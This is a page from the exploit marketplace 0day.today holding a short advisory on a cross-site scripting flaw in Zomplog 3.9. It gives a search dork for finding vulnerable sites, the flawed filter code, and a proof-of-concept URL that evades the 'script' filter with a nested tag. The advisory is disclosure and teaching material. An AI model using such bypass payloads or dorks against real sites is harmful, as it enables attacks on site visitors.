0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Zomplog 3.9 XSS Vulnerability
============================= Zomplog 3.9 XSS Vulnerability ============================= ############################################################################ #Title: Zomplog 3.9 XSS #Vendor: http://www.zomp.nl #Dork: "Powered by Zomplog" ############################################################################ #AUTHOR: ITSecTeam #Email: Bug@ITSecTeam.com #Website: http://www.itsecteam.com #Forum : http://forum.ITSecTeam.com #Original Advisory: http://itsecteam.com/en/vulnerabilities/vulnerability42.htm #Thanks: r3dm0v3, Pejvak, am!rkh@n ############################################################################ #DESCRIPTION (by vendor):################################################### There are many great weblog systems around, but they all require technical knowledge from their users. Zomplog is different: it let's you focus on content instead of code. #BUG:####################################################################### file index.php 10: // some general xxs protection 11: $_GET['search'] = str_replace('script', '', $_GET['search']); 12: $_GET['username'] = str_replace('script', '', $_GET['username']); Code just removes script keyword that leaves file vulnerable to xss. #POC:####################################################################### http://www.site.com/index.php?search="><scrscriptipt>alert(1)</scrscriptipt>\ # 0day.today [2024-11-16] #